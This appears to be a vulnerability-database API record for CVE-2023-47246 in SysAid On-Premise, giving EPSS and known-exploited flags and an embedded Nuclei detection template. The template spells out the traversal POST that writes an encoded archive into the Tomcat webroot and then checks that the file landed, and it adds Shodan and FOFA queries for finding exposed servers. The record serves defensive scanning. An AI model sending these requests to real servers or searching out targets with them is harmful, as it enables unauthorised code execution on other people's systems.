{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2023-47246/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2023-47246/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2023-47246/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2023-47246/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2023-47246/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2023-47246"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2023-47246"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": true
    },
    "epss": {
      "epss": 0.98851,
      "kev": true,
      "percentile": 0.99926
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2023/CVE-2023-47246.yaml",
      "nuclei_template_severity": "critical",
      "nuclei_template_yaml": "id: CVE-2023-47246\n\ninfo:\n  name: SysAid Server - Remote Code Execution\n  author: iamnoooob,rootxharsh,pdresearch\n  severity: critical\n  description: |\n    In SysAid On-Premise before 23.3.36, a path traversal vulnerability leads to code execution after an attacker writes a file to the Tomcat webroot, as exploited in the wild in November 2023.\n  remediation: |\n    Apply the latest security patches and updates from the vendor to address this vulnerability.\n  impact: |\n    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected server.\n  reference:\n    - https://www.huntress.com/blog/critical-vulnerability-sysaid-cve-2023-47246\n    - https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification\n    - https://www.rapid7.com/blog/post/2023/11/09/etr-cve-2023-47246-sysaid-zero-day-vulnerability-exploited-by-lace-tempest/\n    - https://www.cisa.gov/news-events/alerts/2023/11/13/cisa-adds-six-known-exploited-vulnerabilities-catalog\n    - https://documentation.sysaid.com/docs/latest-version-installation-files\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2023-47246\n    cwe-id: CWE-22\n    epss-score: 0.98851\n    epss-percentile: 0.99926\n    cpe: cpe:2.3:a:sysaid:sysaid_on-premises:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: sysaid\n    product: sysaid_on-premises\n    shodan-query:\n      - http.favicon.hash:1540720428\n      - http.favicon.hash:\"1540720428\"\n    fofa-query: icon_hash=\"1540720428\"\n  tags: cve,cve2023,sysaid,rce,kev,traversal,intrusive,vkev,vuln\nvariables:\n  directory: \"{{rand_base(5)}}\"\n\nhttp:\n  - raw:\n      - |\n        POST /userentry?accountId=/../../../tomcat/webapps/{{directory}}/&symbolName=test&base64UserName=YWRtaW4= HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        {{ hex_decode('789c0bf06666e16200819c8abcf02241510f4e201b84851864189cc35c758d0c8c8c754dcc8d4cccf44a2a4a42433819981fdb05a79e63f34b2dade0666064f9cac8c0c0023201a83a3ec43538842bc09b91498e1997b1126071a026862d8d506d1896b0422c41b320c09b950da2979121024887824d02000d3f1fcb') }}\n      - |\n        @timeout: 15\n        GET /{{directory}}/CVE-2023-47246.txt?{{wait_for(9)}} HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"contains(body_2,'CVE_TEST') && status_code_1==200 && status_code_2==200\"\n# digest: 490a004630440220368c8c2621b41ea4a5acbd978d50211784a3da445d8e51018b17886b6a75aed6022060cbb2c33211cd51cbd4c990a546627ad88745823d5bb60c8ee1d8312d7e5253:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2023-47246"
}